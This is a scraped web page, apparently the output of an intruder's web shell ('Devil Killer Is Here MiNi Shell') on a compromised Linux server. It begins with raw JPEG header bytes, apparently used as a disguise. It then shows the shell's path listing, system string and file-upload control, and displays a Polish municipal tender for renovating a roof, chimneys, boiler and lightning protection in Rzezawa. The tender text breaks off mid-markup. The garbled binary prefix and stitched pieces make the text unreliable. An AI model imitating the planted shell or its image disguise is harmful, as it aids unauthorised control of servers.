JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210624/0009398301-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00093983 z dnia 2021-06-24</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Rem dachu bud kom w Rzezawie przy ul. Kościelnej 6” w ram zad pn.: „Mod bud kom w Rzezawie przy ul. Kościelnej 6 dz. nr 1206 wraz z zagosp terenu”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Rzezawa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851660660</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Długa 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzezawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-765</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48146484824</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48146488550</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@rzezawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rzezawa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Rem dachu bud kom w Rzezawie przy ul. Kościelnej 6” w ram zad pn.: „Mod bud kom w Rzezawie przy ul. Kościelnej 6 dz. nr 1206 wraz z zagosp terenu”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-444d8c15-d4d4-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00093983</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002039/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Modernizacja budynku komunalnego w Rzezawie przy ul. Koscielnej 6 działka nr 1206 wraz z zagospodarowaniem terenu.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu:<br/>https://miniportal.pl, ePUAPu: ESP ePUAP:/659xu7usnj/skrytka oraz poczty elektronicznej.<br/>zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto<br/>na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany,<br/>wycofania oferty oraz do formularza do komunikacji. Wymagania techniczne i organizacyjne wysyłania<br/>i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu<br/>oraz Regulaminie ePUAP.Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych<br/>formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 <br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fiz. w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.U.UE.L.119.1), zwanego dalej „RODO” informuje się, że:<br/><br/>1.	Administratorem Pani/Pana danych osobowych jest Wójt Gminy Rzezawa z siedzibą: <br/>32-765 Rzezawa, ul. Długa 21, tel. 14 648 48 00, e-mail: gmina@rzezawa.pl.<br/>2.	W sprawach dotyczących ochrony danych osobowych Wójt Gminy Rzezawa wyznaczył Ins. ochrony danych, z którym może się Pani/Pan kontaktować telefonicznie: <br/>nr tel.:14 6484818, elektronicznie: iod@rzezawa.pl.<br/>3.	Celem przetwarzania Pani/Pana danych osobowych jest – udział w postępowaniu <br/>o udzielenie zamówienia publicznego pn: „Remont dachu budynku komunalnego w Rzezawie przy ul. Kościelnej 6” w ramach zadania pn.: „Modernizacja budynku komunalnego w Rzezawie przy ul. Kościelnej 6 dz. nr 1206 wraz z zagospodarowaniem terenu”.<br/>o numerze RID.ZP.271.1.13.2021 z dnia 24.06.2021 r. prowadzonym w trybie podstawowym bez negocjacji.<br/>4.	Podstawa prawna przetwarzania:<br/>•	art. 6 ust. 1 lit. c – RODO;<br/>•	Ustawa z dnia 29 stycznia 2014 r.- Pzp (t.j.Dz.U.2019.2019) zwana dalej ustawą Pzp.,<br/>5.	Pani/Pana dane osobowe będą udostępniane odbiorcom tj. osobom i podmiotom zgodnie <br/>z art. 74 ustawy Pzp.,<br/>6.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>7.	Obowiązek podania przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zam. pub. Konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>8.	Posiada Pani/Pan prawo dostępu do swoich danych osobowych, prawo do sprostowania swoich danych osobowych, prawo żądania od administratora ograniczenia <br/>ich przetwarzania z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO.<br/>9.	Nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10.	Pani/Pana dane osobowe nie będą przekazywane do państw trzecich.<br/>11.	W odniesieniu do Pani/Pana danych osob. decyzje nie będą podejmowane w sposób zautomatyzowany i nie podlegają profilowaniu.<br/>12.	Przysługuje Pani/Panu prawo do złożenia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osob., ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/><br/><br/>Informujemy, że w zam. pub. administratorem danych osobowych obowiązanym do spełnienia obowiązku informacyjnego z art. 13 RODO będzie również:<br/><br/>Zamawiający – względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał. Dotyczy to w szczególności: <br/>•	Wyk. będącego osobą fiz., <br/>•	Wyk. będącego osobą fiz. prowadzącą jednoosobową działalność gospodarczą<br/>• pełnomocnika Wyk. będącego osobą fiz. (np. dane osobowe zam. <br/>w peł.), <br/>•	członka organu zarządzającego Wyk., będącego osobą fizyczną (np. dane osobowe zam.. w inf. z KRK), <br/>•	osoby fizycznej skierowanej do przygotowania i przeprowadzenia postępowania <br/>o udz. post.<br/><br/>Wykonawca – względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał. Dotyczy to w szczególności:<br/>•	Osoby fiz. skierowanej do realizacji zamówienia,<br/>•	Podw./podmiotu trzeciego będącego osobą fiz.,<br/>•	Podw./podmiotu trzeciego będącego osobą fiz., <br/>•	Pełn. podwykonawcy/podmiotu trzeciego będącego osobą fiz. np.<br/>•	Członka organu zarządzającego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RID.ZP.271.1.13.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach ww. zadania planuje się wykonać następujące prace, tj.:<br/>•	w zakresie branży budowlanej:<br/>	docieplenie stropu nad parterem<br/>	wymiana obróbek blacharskich, orynnowania<br/>	remont kominów<br/>	remont więźby dachowej wraz z wymianą pokrycia<br/>•	w zakresie branży sanitarnej:<br/>	wymiana kotła centralnego ogrzewania, remont pomieszczeń kotłowni<br/>•	w zakresie branży elektrycznej:<br/>	remont instalacji odgromowej wraz z pomiarami.<br/><br/>Budynek użyteczności publicznej zlokalizowany przy ul. Kościelna 6 w Rzezawie pełni funkcję Domu Seniora (wyższa, starsza część budynku, objęta ochroną konserwatorską i wpisana do Gminnej Ewidencji Zabytków Gminy Rzezawa jako „Dawna Szkoła Podstawowa”) oraz Gminnej Biblioteki Publicznej (niższa dobudowana, po stronie zachodniej część budynku, nieobjęta ochroną konserwatorską).<br/><br/>W ZAKRESIE DOCIEPLENIA STROPU NAD PARTEREM:<br/>- STR D - Strop nad poddaszem docieplić warstwą izolacji termicznej z użyciem mat wełny mineralnej o współczynniku λ=0,035 W/m*K i grubości 22 cm.<br/>Podłoże dokładnie oczyścić / w stanie istniejącym na starej części budynku cegła ceramiczna pełna układana na płask /. Na oczyszczonej powierzchni zastosować folię paroizolacyjną. Na foli paraizolacyjnej rozłożyć maty wełny mineralnej gr. 22 cm.<br/>Celem uniknięcia uszkodzeń / ugniatania / mat wełny do wyłazu dachowego należy wykonać podest technologiczny. Podest należy wykonać na odcinku od wyłazu na strych do wyłazu na dach. Podest technologiczny wykonać z kantówki w formie podwalin o wym. 14 x 22 cm w rozstawie max 60 cm, na podwalinach ułożyć deskowanie gr. 3,8 cm i szerokości 30 cm.<br/><br/>W ZAKRESIE WYKONANIA OBRÓBEK BLACHARSKICH, ORYNNOWANIA:<br/>Nowe elementy obróbek wykonane z blachy stalowej powlekanej gr. 0,5 - 0,6 mm w kolorze zgodnym z kolorystyką elewacji.<br/>Rury spustowe należy zamontować po starych śladach z użyciem nowych wsporników.<br/><br/>W ZAKRESIE REMONTU KOMINÓW:<br/>Z uwagi na stan techniczny istniejących kominów należy je przemurować do poziomu stropu nad ostatnią kondygnacją.<br/>	rozebranie istniejących kominów do poziomu stropu nad ostatnią kondygnacją,<br/>	oczyszczenie podłoża,<br/>	wymurowanie nowych kominów cegły ceramicznej pełnej klasy 15 MPa na zaprawie cem. - wap. M - 8 MPa o wymiarach istniejących przewodów kominowych<br/>	wykonanie czap na kominach z betonu zbrojonego drutem O 4, beton C16/20<br/>	wykonanie obróbek blacharskich,<br/>Wokół kominów należy uszczelnić miejsca, gdzie przechodzą on przez połać dachową. Obróbkę blacharską zamocować bezpośrednio do ścianek komina, a jej krawędź osłonić specjalną listwą, należy również ukształtować tzw. kozubek – uwypuklenie, zapobiegające zastoinom wody i zatrzymywaniu zanieczyszczeń u podstawy komina. Wykończony komin należy przykryć czapą w celu ochrony przed wnikaniem wody opadowej do komina. Czapę przykrywającą komin wykonać z mocnego, zbrojonego betonu w deskowaniu. Beton do wykonania czapy powinien zawierać dodatek uszczelniający, który poprawia mrozoodporność. Czapa powinna wystawać ok. 5 - 6 cm poza obrys komina. Wierzch czapy zabezpieczyć obróbką blacharską.<br/><br/>W ZAKRESIE REMONTU WIĘŻBY DACHOWEJ WRAZ Z WYMIANĄ POKRYCIA:<br/>W wyniku dokonanej inwentaryzacji i oceny stanu technicznego stwierdzono nieszczelności pokrycia dachowego, i co za tym idzie, zawilgocenia elementów więźby dachowej.<br/>Z uwagi na stan techniczny konstrukcji dachu (degradacja przez wilgoć, grzyby, szkodniki, widoczne cechy drewna próchniczego) koniecznym jest wykonanie remontu oraz wymiana 100% łat, kontrłat oraz około 30 - 40% elementów konstrukcji dachu na nowe.<br/>Wymianie podlega również pokrycie dachu.<br/>W ramach prac remontowych należy wykonać:<br/>	demontaż orynnowania, obróbek blacharskich,<br/>	demontaż pokrycia,<br/>	demontaż łat,<br/>	demontaż elementów konstrukcji dachu podlegających wymianie,<br/>	wymianę około 30 - 40% elementów konstrukcji dachu,<br/>	wykonanie folii wiatroizolacyjnej,<br/>	wykonanie nowych kontrłat,<br/>	wymianę 100% łat,<br/>	wymianę pokrycia dachowego na nową dachówkę,<br/>	montaż elementów wyposażenia dachu,<br/>	montaż systemowych wyłazów dachowych w miejsce istniejących,<br/>	montaż obróbek blacharskich, orynnowania.<br/><br/>Konstrukcja dachu:<br/>Wymieniane elementy więźby dachowej odtworzyć w istniejącej formie, z zachowaniem obecnych przekrojów drewna oraz sposobów mocowania. Projektem przewidziano zastosowanie drewna o klasie C24.<br/><br/>Wykaz projektowanych warstw (od góry):<br/>- dachówka ceramiczna - marsylka,<br/>- łaty 5 x 4 cm, w rozstawie dopasowanym do dachówki<br/>- kontrłaty 5 x 4 cm,<br/>- folia wiatroizolacyjna,<br/>- istniejące krokwie / wymienione<br/><br/>Uwaga.<br/>W zakresie budynku objętego ochroną konserwatorską ze względu na zły stan istniejącego pokrycia dachowego z dachówki ceramicznej, przewidziano go w 100% do wymiany. W projekcie przewidziano zastosowanie nowej tego samego rodzaju dachówki.<br/>W zakresie budynku nieobjętego ochroną konserwatorską przewiduje się wymianę pokrycia dachowego z blachy falistej na dachówkę ceramiczną.<br/><br/>KOSZ W POŁĄCZENIU DACHÓW:<br/>Wykaz projektowanych warstw (od góry):<br/>- blacha płaska łączona na rąbek stojący, w kolorze zastosowanej dachówki,<br/>- płyta OSB gr. 22 mm,<br/>- istniejąca konstrukcja,<br/>Wszystkie elementy drewniane zaimpregnować środkami ognio-, grzybo i owadochronnymi.<br/><br/><br/>W ZAKRESIE WYMIANY KOTŁA I REMONTU POMIESZCZEŃ KOTŁOWNI:<br/>Projektuje się wymianę istniejącego kotła gazowego. W celu zapewnienia energii potrzebnej do zasilenia instalacji c.o. zaprojektowano kocioł gazowy stojący z palnikiem modulowanym o mocy 6,3 – 31,7 kW. Kocioł zlokalizowano w pomieszczeniu istniejącej kotłowni w pomieszczeniu nr I-1/10.<br/>Odprowadzenie spalin będzie realizowane poprzez układ systemowy zgodny z wytycznymi producenta.<br/>Za sterowanie pracą kotłowni gazowej odpowiedzialny będzie sterownik producenta kotła. Nastawy na poziomie użytkownika będzie można wykonać poprzez termostat pokojowy. W budynku istnieje instalacja gazowa doprowadzająca paliwo do istniejącego kotła gazowego. Projektuje się wykorzystanie istniejącej instalacji gazowej do zasilania nowo projektowanego kotła. W zakresie remontu pomieszczeń kotłowni przewiduje się m.in. wykonanie nowej posadzki, malowanie ścian i sufitu.<br/><br/>W ZAKRESIE REMONTU INSTALACJI ODGROMOWEJ:<br/>Istniejącą instalację odgromową należy zdemontować. Na dachu budynku ułożyć nowe przewody odgromowe. Przewody instalacji odgromowej na dachu ułożyć po trasach pokazanych na rysunku. Przewody odgromowe (drut ocynkowany dn8) układać na wspornikach odstępowych, montowanych do gąsiorów. Wsporniki instalować w odległościach – co 1m.<br/>Do wykonywania połączeń pomiędzy przewodami (drut ocynkowany dn8) i metalowymi elementami stosować skręcane uchwyty. W oznaczonych miejscach zainstalować iglice mocowane do kominów wentylacyjnych.<br/>Jako przewody odprowadzające należy zastosować druty ocynkowane dn 8.<br/>Przewody odprowadzające na zabytkowej części budynku należy układać na uchwytach dystansowych na elewacji budynku. Przewody odprowadzające należy zakończyć złączami kontrolnymi. Przewody uziemiające przebiegające od złącza kontrolnego do uziomu należy wykonać bednarką ocynkowaną 25x4mm, układaną na ścianie. Przewody uziemiające połączyć z uziomem otokowym. W razie potrzeby uziom uzupełnić układając bednarkę ocynkowaną 25x4 w wykopie na głębokości 0,7m. Połączenia bednarki oraz połączenia uziomu z przewodami uziemiającymi należy wykonywać przez spawanie. Miejsca połączeń powinny być zabezpieczone przed korozją.<br/>Budynek w nowszej części zostanie docieplony warstwą styropianu. W tym rejonie ze względów estetycznych projektowane jest umieszczenie przewodów odprowadzających pod warstwą ocieplenia. Jako przewody odprowadzające należy zastosować druty ocynkowane dn8. Przewody odprowadzające należy układać pod warstwą ocieplenia w rurach ochronnych nierozprzestrzeniających płomienia dn40/3,7 (grubość ścianki 3,7mm). Rury ochronne należy ułożyć w bruzdach w ścianie lub obetonować. Przewody odprowadzające należy zakończyć złączami kontrolnymi. Złącza kontrolne umieścić w puszkach na cokole budynku, na wysokości 0,2-0,5m. Przewody uziemiające przebiegające od złącza kontrolnego do uziomu należy wykonać bednarką ocynkowaną 25x4mm, układaną na ścianie i fundamencie w warstwie ocieplenia. Przewody uziemiające połączyć z uziomem otokowym. W razie potrzeby uziom wykonać układając bednarkę ocynkowaną 25x4 w wykopie na głębokości 0,7m. Połączenia bednarki oraz połączenia uziomu z przewodami uziemiającymi należy wykonywać przez spawanie. Miejsca połączeń powinny być zabezpieczone przed korozją.<br/>W ramach remontu instalacji odgromowej należy wykonać pomiary instalacji odgromowej.<br/><br/>Zamawiający złożył dokumenty do Starostwa Powiatowego w Bochni celem zgłoszenia budowy lub wykonania robót budowlanych w ramach realizacji ww. zadania.<br/><br/>Wykonawca otrzyma wynagrodzenie kosztorysowe.<br/>Szczegółowy zakres realizacji zadania został przedstawiony w dokumentacji projektowej.<br/>W ramach ogłoszonego przetargu szczegółowy zakres robót został wyszczególniony w przedmiarach robót.<br/><br/>W związku z wynagrodzeniem kosztorysowym, należy pominąć pozycje przekreślone / wykreślone i należy wypełnić przedmiar w pozostałym (zaznaczonym kolorem żółtym) zakresie, tj.:<br/>1) branża: budownictwo <br/><br/>Roboty budowlane będą prowadzone na terenie czynnych obiektów użyteczności publicznej, tj. Dom Seniora oraz Gminna Biblioteka Publiczna, a w związku z tym Wykonawca:<br/>1)	zapewni wykonywanie robót bez wstrzymywania ruchu w obiektach i w sposób niedezorganizujący użytkowania i pracy na ternie obiektów;<br/>2)	zapewni zabezpieczenie dróg komunikacyjnych prowadzących na teren budowy i do użytkowanych obiektów;<br/>3)	zapewni bieżące sprzątanie terenu budowy;<br/>4)	zapewni systematyczne sprzątanie i pozostawianie w czystości pomieszczeń, dróg transportowych itp. wykorzystywanych w czasie prac, w stanie w jakim je zastał;<br/>5)	zapewni prowadzenie robót w sposób niepowodujący szkód i zagrożenia bezpieczeństwa dla ludzi oraz zapewniający ochronę przed uszkodzeniem lub zniszczeniem własności publicznej i prywatnej;<br/>6)	zapewni bieżące usuwanie gruzu i materiałów zbędnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45315000-8 - Instalowanie urządzeń elektrycznego ogrzewania i innego sprzętu elektrycznego w budynkach</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45331110-0 - Instalowanie kotłów</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span 